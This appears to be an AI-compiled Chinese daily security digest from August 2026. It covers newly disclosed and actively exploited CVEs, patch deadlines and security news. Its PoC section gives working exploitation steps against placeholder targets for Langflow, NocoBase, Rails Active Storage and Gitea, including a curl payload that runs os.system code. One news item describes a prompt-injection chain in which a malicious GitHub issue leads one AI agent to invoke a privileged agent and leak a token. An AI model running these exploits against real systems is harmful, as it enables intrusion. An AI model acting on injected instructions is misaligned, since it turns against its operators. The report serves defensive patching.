每日安全情报报告 · 2026-08-05
# 每日安全情报报告 · 2026-08-05 **由 AI 整理发布** 覆盖范围2026-08-03 至 2026-08-05近 24–48 小时新增/在野利用漏洞与情报。 风险标注**【严重】** CVSS ≥ 9.0 **【高危】** 7.0 ≤ CVSS 9.0 **【在野利用】** 已被 CISA KEV 或厂商确认实战利用。 --- ## 一、重点提示Executive Summary - **Adobe Campaign Classic 紧急修复一波零点击、零认证漏洞APSB26-1208/3**CVE-2026-48331SSRF、CVE-2026-48323模板注入、CVE-2026-48330SQLi三项 CVSS 均满分 10.0攻击者无需凭据与交互即可在本地/混合部署的营销服务器上执行任意代码建议立即升级到 build 9399。 - **CISA KEV 8/4 一口气新增 3 项在野漏洞**IBM Langflow 代码注入 **CVE-2026-9198CVSS 9.8**、Apache Tomcat **CVE-2026-34486CVSS 7.5**、N-able N-central **CVE-2026-18556**。其中 Langflow 默认部署即可被未认证者取得 SUPERUSER 并实现完整 RCEBOD 修复截止日 **2026-08-07**。 - **N-able N-central 认证绕过链条已实际攻陷 MSP 客户**CVE-2026-18577 是 CVE-2026-18556 的不完整补丁CISA 8/3 列入 KEVBOD 截止 **2026-08-06**。攻击者在补全补丁前已通过 Take Control Cloudflare 隧道持久化。 - **AI/LLM 基础设施持续成为重灾区**Veeam ONE 代理主机未认证 RCECVE-2026-6463310.0、HashiCorp Terraform MCP Server 跨租户凭据重用CVE-2026-1649810.0、SiYuan 笔记未认证 SQL 注入CVE-2026-690849.9/10.0、NocoBase SQLi→PG 超级用户 RCECVE-2026-5288710.0公开 PoC。 - **公开可利用 PoC 集中爆发**NocoBase CVE-2026-52887、Rails KindaRails2Shell CVE-2026-66066已集成 Metasploit、Langflow CVE-2026-9198 均已有可复现利用请在授权环境中尽快验证与修补。 --- ## 二、最新高危漏洞 ### 2.1 在野利用漏洞CISA KEV 重点标注 | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 风险 | 链接 | |----------|----------|------------|------|------|------| | CVE-2026-9198 | 代码注入未认证 RCE | IBM Langflow OSS 1.0.0–1.10.0 | 9.8 | 【严重】【在野利用】 | [IBM 安全公告](https://www.ibm.com/support/pages/node/7278927) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-9198) | | CVE-2026-18577 | 认证绕过CVE-2026-18556 的不完整补丁 | N-able N-central 2026.3.1.7 | 8.2 | 【高危】【在野利用】 | [CISA KEV 条目](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cveCVE-2026-18577) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-18577) | | CVE-2026-18556 | 认证绕过使用备用路径/通道 | N-able N-central | 8.2 | 【高危】【在野利用】 | [CISA KEV 条目](https://www.cisa.gov/kev) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-18556) | | CVE-2026-34486 | 加密缺失EncryptInterceptor 绕过 | Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 | 7.5 | 【高危】【在野利用】 | [Apache 邮件列表公告](https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-34486) | **在野漏洞修复截止提醒**CVE-2026-18577 的 BOD 26-04 截止日为 **2026-08-06**CVE-2026-9198 / CVE-2026-34486 截止日为 **2026-08-07**联邦及面向公网资产务必优先处置。 ### 2.2 其他严重 / 高危漏洞近 48 小时新增 | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 风险 | 链接 | |----------|----------|------------|------|------|------| | CVE-2026-48330 / CVE-2026-48331 / CVE-2026-48323 | SQL 注入 / SSRF / 模板注入均零交互、零认证 RCE | Adobe Campaign ClassicACCv7.4.3 build 9398 及更早 | 10.0 | 【严重】 | [Adobe APSB26-120](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) [分析报道](https://hackersradar.com/critical-adobe-campaign-classic-flaws-let-attackers-run-code) | | CVE-2026-48326 | SQL 注入需低权限账户 | Adobe Campaign Classic | 9.9 | 【严重】 | [Adobe 安全公告](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | | CVE-2026-48333 / CVE-2026-48317 | 授权缺陷 / eval 注入 | Adobe Campaign Classic | 9.8 / 9.6 | 【严重】 | [Adobe 安全公告](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | | CVE-2026-64633 | 远程未认证代码执行代理主机 | Veeam ONE 13.0.2.6723 及更早 13.x | 10.0v4.0 | 【严重】 | [Veeam KB4892](https://veeam.com/kb4892) [GitHub 公告](https://github.com/advisories/GHSA-xw3v-hx8p-r8v7) | | CVE-2026-69084 | SQL 注入未认证可达匿名 | SiYuan 笔记 ≤ v3.7.2 | 9.9v4.0/ 10.0v3.1 | 【严重】【公开 PoC】 | [GitHub 公告 GHSA-vh22-h7hf-www7](https://github.com/advisories/GHSA-p2x7-4c4p-8wh6) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-69084) | | CVE-2026-69085 | SQL 注入/api/filetree/searchDocs | SiYuan 笔记 v3.7.3 | 10.0v3.1/ 9.9v4.0 | 【严重】 | [IONIX 分析](https://www.ionix.io/threat-center/cve-2026-69085) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-69085) | | CVE-2026-16498 | 跨租户凭据重用无状态 HTTP 模式 | HashiCorp Terraform MCP Server 0.2.1–1.0.0 | 10.0 | 【严重】 | [HashiCorp HCSEC-2026-23](https://discuss.hashicorp.com/t/hcsec-2026-23-multiple-vulnerabilities-impacting-hashicorp-terraform-mcp-server/77606) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-16498) | | CVE-2026-16496 / CVE-2026-14869 | 授权绕过有状态缓存/ 未认证 SSRF | HashiCorp Terraform MCP Server | 8.9 / 8.6 | 【高危】 | [HashiCorp HCSEC-2026-23](https://discuss.hashicorp.com/t/hcsec-2026-23-multiple-vulnerabilities-impacting-hashicorp-terraform-mcp-server/77606) | | CVE-2026-24254 | 越界写多模态服务拓扑 | NVIDIA Dynamo for Linux | 9.8 | 【严重】 | [NVIDIA 产品安全](https://github.com/NVIDIA/product-security/tree/main/2026/5842) [GitHub 公告](https://github.com/advisories/GHSA-4gq3-gh66-qq8g) | | CVE-2026-58048 | 认证用户以数据库 root 执行 SQL越权 | cPanel WHM所有受支持版本/ WP Squared | 9.4v4.0 | 【高危】 | [The Hacker News 报道](https://thehackernews.com/) | | CVE-2026-52887 | SQL 注入 → PostgreSQL 超级用户 RCE | NocoBase ≤ 2.0.60 | 10.0 | 【严重】【公开 PoC】 | [NocoBase 公告 GHSA-p849-8hwh-84j9](https://github.com/nocobase/nocobase/security/advisories/GHSA-p849-8hwh-84j9) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-52887) | | CVE-2026-67192 / CVE-2026-67191 / CVE-2026-67193 | 栈溢出 RCE / 堆溢出 / 信息泄露均预认证 | Xlight FTP Server 3.9.5 | 9.3 / 8.1 / — | 【严重】 | [安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15860) | | CVE-2026-50343 | 本地权限提升Dark Elevator | Windows InstallService微软 7 月补丁已修 | 7.8 | 【高危】【PoC 已公开】 | [利用分析](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15865) | | CVE-2026-66066 | 任意文件读 → RCEKindaRails2Shell | Rails Active Storage7.23.2 / 8.05.1 / 8.13.1需 libvips≥8.13 | 9.5v4.0/ 9.8v3.1 | 【严重】【公开 PoC】 | [Rails 安全公告 GHSA-xr9x-r78c-5hrm](https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm) [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-66066) | --- ## 三、最新漏洞 PoC含使用步骤 **合规声明**以下 PoC 仅供授权测试与防御研究使用严禁用于未授权目标。 ### 3.1 CVE-2026-9198 — IBM Langflow 未认证 RCE在野 - **来源 / 链接**[Yazoul 技术分析含 PoC 思路](https://www.yazoul.net/advisory/cve/cve-2026-9198-langflow-unauthenticated-rce-exploited-in-wild-poc) [IBM 公告](https://www.ibm.com/support/pages/node/7278927) - **漏洞类型**代码注入CWE-94链式利用 /api/v1/auto_login /api/v1/validate/code - **利用步骤手动复现无需依赖安装** bash # 第 1 步向 auto_login 端点请求获取 SUPERUSER 令牌默认配置下无需任何凭据 curl -X POST http://TARGET:7860/api/v1/auto_login # 第 2 步使用返回的 Bearer 令牌通过 validate/code 端点提交任意 Python 载荷 curl -X POST http://TARGET:7860/api/v1/validate/code \ -H Authorization: Bearer 上一步获取的token \ -H Content-Type: application/json \ -d {code:import os; os.system(\id /tmp/poc.txt\)} - **修复**升级 Langflow OSS 至 **1.10.1**临时缓解——限制网络暴露、在反向代理层封禁上述两个端点、设置 LANGFLOW_AUTO_LOGINfalse。 ### 3.2 CVE-2026-52887 — NocoBase SQLi → PostgreSQL 超级用户 RCE - **来源 / 链接**[公开 PoC 仓库含 exploit.py 与 Docker 实验环境](https://github.com/BiiTts/CVE-2026-52887-NocoBase-SQLi-RCE) [NocoBase 公告](https://github.com/nocobase/nocobase/security/advisories/GHSA-p849-8hwh-84j9) - **漏洞类型**SQL 注入CWE-89→ 堆叠语句 → COPY ... TO PROGRAM 系统命令执行 - **依赖**Python 3Docker启动测试环境 - **使用步骤** bash git clone https://github.com/BiiTts/CVE-2026-52887-NocoBase-SQLi-RCE.git cd CVE-2026-52887-NocoBase-SQLi-RCE # 启动漏洞环境默认 auth-basic 允许自助注册故实际可达未认证 docker run -d --name nb-pg --network host \ -e POSTGRES_USERnocobase -e POSTGRES_PASSWORDnocobase -e POSTGRES_DBnocobase postgres:16 docker run -d --name nb-app --network host \ -e DB_DIALECTpostgres -e DB_HOST127.0.0.1 -e DB_PORT5432 \ -e DB_DATABASEnocobase -e DB_USERnocobase -e DB_PASSWORDnocobase \ -e APP_KEYchange-me -e APP_PORT13000 nocobase/nocobase:2.0.57 # 执行 PoC自动注册 登录 触发 COPY TO PROGRAM RCE python3 exploit.py -u http://127.0.0.1:13000 --cmd id /tmp/proof 21 docker exec nb-pg cat /tmp/proof # 验证以 postgres OS 用户执行 - **修复**升级 NocoBase 至 **2.0.61**临时缓解——将数据库用户降权取消 SUPERUSER、在 WAF 层过滤 filter[latestMsgReceiveTimestamp][$lt] 中的非数字字符。 ### 3.3 CVE-2026-66066 — Rails Active Storage KindaRails2Shell 任意文件读 → RCE - **来源 / 链接**[Rails 安全公告 GHSA-xr9x-r78c-5hrm](https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm) [Ethiack 研究KindaRails2Shell](https://ethiack.com/info-hub/research/kindarails2shell-rails-rce-cve-2026-66066) [Metasploit 模块jburgess-r7](https://github.com/rapid7/metasploit-framework) - **漏洞类型**libvips 未禁用unfuzzed加载器 → 上传构造文件触发变体处理 → 读取 /proc/self/environ含 secret_key_base→ 伪造签名实现 RCE - **使用步骤Metasploit 自动化** bash # 需已安装 Metasploit Framework msfconsole use exploit/multi/http/rails_kindarails2shell set RHOSTS 目标主机 set TARGETURI / set VPS_MIN_VERSION 8.13 # 要求目标 libvips 8.13 run - **修复**升级 Active Storage 至 **7.2.3.2 / 8.0.5.1 / 8.1.3.1**且 libvips ≥ 8.13必须**轮换**所有可能已被读取的密钥secret_key_base、云凭证、数据库凭证临时缓解——设置环境变量 VIPS_BLOCK_UNTRUSTEDtrue 或调用 Vips.block_untrusted(true)。 ### 3.4 CVE-2026-60004 — Gitea 预认证 RCE持续在野附完整 PoC - **来源 / 链接**[公开 PoC 仓库Python仅用标准库](https://github.com/imbas007/CVE-2026-60004-POC) [GitHub 公告](https://github.com/advisories/GHSA-xr9x-r78c-5hrm) - **漏洞类型**diffpatch 端点 Git hook 注入CWE-94CVSS 9.8默认开放注册 - **依赖**Python 3.7无需 pip 安装 - **使用步骤** bash git clone https://github.com/imbas007/CVE-2026-60004-POC.git cd CVE-2026-60004-POC # 全自动化注册 建仓 利用 取回结果 python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode full-auto --cmd id # 仅检测非侵入 python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode check - **修复**升级 Gitea 至已修复版本并关闭不必要的公开注册临时缓解——限制 /api/v1/repos/{owner}/{repo}/diffpatch 端点访问。 --- ## 四、网络安全最新文章 1. **Google 删除 3 个 ADK AI 工作流恶意 GitHub Issue 可触发特权 AgentAgent 间攻击首例** — Pillar Security 演示公开 triage Agent 被提示注入后跨信任边界调用高权限 code-fixing Agent导致 CI runner 代码执行与 bot PAT 泄露。 [阅读原文The Hacker News](https://thehackernews.com/2026/08/google-deletes-3-adk-ai-workflows-after.html) [FreeBuf 中文报道](https://www.freebuf.com/articles/ai-security/493568.html) 2. **cPanel 严重漏洞允许托管客户以数据库 root 执行 SQLCVE-2026-58048** — 认证用户可越过账户边界在数据库 root 上下文执行任意 SQL高危托管环境需尽快打补丁。 [阅读原文The Hacker News](https://thehackernews.com/) 3. **DOUBLECUP 利用 ClickFix 与浏览器缓存 PNG 投递 CountLoader 和 DeviceManager RAT** — 俄罗斯 LaaS将隐写 PNG 植入浏览器缓存以受害人公网 IP 作为解密密钥实现环境锁定DeviceManager 用 EtherHiding区块链解析 C2。 [阅读原文BleepingComputer](https://www.bleepingcomputer.com/news/security/new-doublecup-clickfix-service-hides-malware-in-browser-cache-images/) 4. **CISA 将 N-able N-central 漏洞加入 KEV已有客户被攻陷** — 认证绕过在初次修复后仍被用于入侵 MSP 客户攻击者借 Take Control 与 Cloudflare 隧道持久化。 [阅读原文The Hacker News](https://thehackernews.com/) 5. **N-able攻击者攻陷 N-central 服务器初次修复不完整** — 攻击链细节披露强调 RMM/MSP 平台已成为系统性高危入口。 [阅读原文The Hacker News](https://thehackernews.com/) 6. **Hugging Face Diffusers 三漏洞可绕过 trust_remote_code 执行任意代码FaceHugger** — 自定义管道加载过程中绕过安全护栏AI 供应链风险已修复于 0.38.0。 [阅读原文The Hacker News](https://thehackernews.com/2026/08/hugging-face-diffusers-flaws-could-let.html) 7. **Adobe 紧急修复 Campaign Classic 高危漏洞三个 10 分未授权 RCE** — APSB26-120 修复 SSRF/模板注入/SQLi 等多项零交互漏洞本地与混合部署须升级 build 9399。 [阅读原文HackersRadar](https://hackersradar.com/critical-adobe-campaign-classic-flaws-let-attackers-run-code) 8. **Xlight FTP 服务器曝出三个预认证漏洞最严重可达 RCE** — 影响 3.9.5 之前版本SSH GCM 处理中的栈/堆溢出官方已发布 3.9.5 修复。 [查看详情安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15860) 9. **CVE-2026-50343 Dark Elevator Windows 本地提权利用代码公开** — InstallService 逻辑缺陷允许标准用户提升至 SYSTEM无需 UAC 或重启可靠性高。 [查看详情安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15865) 10. **HashiCorp Terraform MCP Server 严重漏洞 CVSS 10.0跨租户凭据重用** — AI Agent 集成场景下的隔离失效升级至 1.1.0。 [查看详情安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id15863) 11. **OpenAI 披露网络犯罪分子如何利用 ChatGPT 运营诈骗行动** — 犯罪网络利用 ChatGPT 创建虚假身份与欺诈网站实施婚恋、投资诈骗并关联强迫劳动。 [阅读原文FreeBuf](https://www.freebuf.com) 12. **CareCloud 数据泄露约 34.5 万患者健康记录、SSN 与财务数据暴露** — AWS 环境在 3 月被未授权访问影响 4.5 万 医疗服务提供者。 [阅读原文Enigma 日报](https://www.enigma-global.com/blog/daily-digest-2026-08-04) 13. **XCSSET v40 卷土重来通过中毒 Xcode 项目攻击 macOS** — 重大重构几乎全内存运行并具备强多态与反检测能力劫持 Chrome 与 Telegram。 [阅读原文Enigma 日报](https://www.enigma-global.com/blog/daily-digest-2026-08-04) 14. **Open WebUI 单批次披露 17 个 CVE** — 含存储型 XSS、同源 XSS 账户接管、SSRF、OAuth 令牌交换接管等高危问题CVE-2026-70492 等。 [查看详情CVE 跟踪](https://cve-dev.imfht.com/detail/CVE-2026-70494) --- *部分内容由 AI 辅助生成*

相关新闻

BiliTools终极指南:3分钟掌握免费B站资源下载神器

BiliTools终极指南:3分钟掌握免费B站资源下载神器

BiliTools终极指南:3分钟掌握免费B站资源下载神器 【免费下载链接】BiliTools 本项目已停止维护。 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools 想要轻松下载B站视频、番剧和音乐资源吗?BiliTools作为一款免费开源的跨平台B站…

2026/9/28 13:19:22 阅读更多 →
从kickstart.nvim迁移到nixCats-nvim:保留习惯,拥抱Nix

从kickstart.nvim迁移到nixCats-nvim:保留习惯,拥抱Nix

从kickstart.nvim迁移到nixCats-nvim:保留习惯,拥抱Nix 【免费下载链接】nixCats-nvim the predecessor to nix-wrapper-modules#neovim 项目地址: https://gitcode.com/gh_mirrors/ni/nixCats-nvim nixCats-nvim作为kickstart.nvim的Nix实现版本…

2026/10/2 0:30:00 阅读更多 →
GameFramework-Next:下一代Unity游戏开发框架的完整解决方案

GameFramework-Next:下一代Unity游戏开发框架的完整解决方案

GameFramework-Next:下一代Unity游戏开发框架的完整解决方案 【免费下载链接】GameFramework-at-YooAsset GameFramework-Next 项目地址: https://gitcode.com/gh_mirrors/ga/GameFramework-at-YooAsset GameFramework-Next是基于Unity引擎的下一代游戏开发框…

2026/9/24 11:18:25 阅读更多 →

最新新闻

office ppt上面没有mathtype 插件,就会导致下面错误?

office ppt上面没有mathtype 插件,就会导致下面错误?

office ppt上面没有mathtype 插件,就会导致下面错误? 🎯 该报错和MathType插件缺失的关联结论 这个弹窗提示的错误,‌有可能是PPT里原本嵌入的MathType公式,在当前环境没有MathType插件时触发的,但它并不是MathType缺失的专属报错‌,还有很多其他场景也会弹出完全相同…

2026/10/11 9:36:44 阅读更多 →
论文初稿被批太水?师姐安利这几个AI论文写作软件

论文初稿被批太水?师姐安利这几个AI论文写作软件

写论文总是被说“太水”?选题难、逻辑乱、文献少、格式错,这些问题在学术路上几乎人人都遇到过。其实,关键不在于天赋,而在于方法——用对AI工具走对流程,效率和质量都能大幅提升。资深教授也普遍推荐:千笔…

2026/10/11 9:36:44 阅读更多 →
DeepSeek大模型本地部署与调优实战:从MoE架构到性能优化

DeepSeek大模型本地部署与调优实战:从MoE架构到性能优化

简介:这是一份聚焦DeepSeek大模型技术解析的入门宝典,面向自然语言处理研究人员、人工智能应用开发者与企业技术决策者,系统梳理了DeepSeek公司从成立到R1发布的完整脉络。文档不仅介绍R1高性能推理、完全开源和低成本三大特点,还…

2026/10/11 9:36:44 阅读更多 →
REA模型实战:用事件驱动建模解决订单库存财务对账难题

REA模型实战:用事件驱动建模解决订单库存财务对账难题

如果你维护过订单、库存、财务这三个模块,多半遇到过这种经典场面:同一个业务动作,在订单系统里是一条记录,在仓库那边变成一张出库单,传到财务又得手工生成一张记账凭证。数据从上游流到下游,口径已经在层…

2026/10/11 9:36:44 阅读更多 →
自建技能管理系统:从数据模型到状态机的完整实践

自建技能管理系统:从数据模型到状态机的完整实践

1. 为什么自建技能管理系统,而非直接用一个App最近在复盘自己这一年的学习路径时,我翻遍了手机里的打卡软件、笔记软件和备忘录,发现一个挺尴尬的事实:技能点散落得到处都是。今天在这个App里记了几条英语学习记录,明天…

2026/10/11 9:36:44 阅读更多 →
【单片机课设毕设项目】基于物联网的居室空气质量监测与自动通风补光系统设计 基于单片机的室内环境综合参数检测与手机端告警装置设计(030125)

【单片机课设毕设项目】基于物联网的居室空气质量监测与自动通风补光系统设计 基于单片机的室内环境综合参数检测与手机端告警装置设计(030125)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于嵌入式单片机,Java、小程序技术领域和毕业项目实战 ✌️…

2026/10/11 9:35:44 阅读更多 →

日新闻

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

简介:基于 ARIMA、LSTM、Transformer 等模型的流感时间序列预测 Python 源码,面向计算机相关专业课程设计与期末大作业学生,以及项目实战学习者。内容覆盖预处理、平稳性检验、定阶、残差分析、多模型对比预测的完整时序建模流程,…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别 做影刀RPA自动化,十个新手有八个栽在"往输入框里填东西"这件事上:要么填不进去,要么填了一半,要么直接把原来内容追加在后面。这背后的根因&…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容 1. 认识影刀:什么场景该用RPA采小说数据 起点中文网的页面结构相对稳定——分类榜单、书籍详情、章节内容三块独立页面,跳转链路清晰。这种场景非常适合影刀自动化&#x…

2026/10/11 0:00:27 阅读更多 →

周新闻

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

简介:基于 ARIMA、LSTM、Transformer 等模型的流感时间序列预测 Python 源码,面向计算机相关专业课程设计与期末大作业学生,以及项目实战学习者。内容覆盖预处理、平稳性检验、定阶、残差分析、多模型对比预测的完整时序建模流程,…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别 做影刀RPA自动化,十个新手有八个栽在"往输入框里填东西"这件事上:要么填不进去,要么填了一半,要么直接把原来内容追加在后面。这背后的根因&…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容 1. 认识影刀:什么场景该用RPA采小说数据 起点中文网的页面结构相对稳定——分类榜单、书籍详情、章节内容三块独立页面,跳转链路清晰。这种场景非常适合影刀自动化&#x…

2026/10/11 0:00:27 阅读更多 →

月新闻

我发现了一个新思路:用 Remotion + Claude Code 像写代码一样自动化生成短视频

我发现了一个新思路:用 Remotion + Claude Code 像写代码一样自动化生成短视频

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/10 5:23:50 阅读更多 →
Windows下 Codex 中 Chrome 和 Computer Use 插件不可用问题排查及解决参考方式:TaoToken 统一 Key 配置与验证

Windows下 Codex 中 Chrome 和 Computer Use 插件不可用问题排查及解决参考方式:TaoToken 统一 Key 配置与验证

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/9 21:32:20 阅读更多 →
黑夜航拍船只数据集训练YOLOV5模型全流程解析

黑夜航拍船只数据集训练YOLOV5模型全流程解析

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/10 10:38:42 阅读更多 →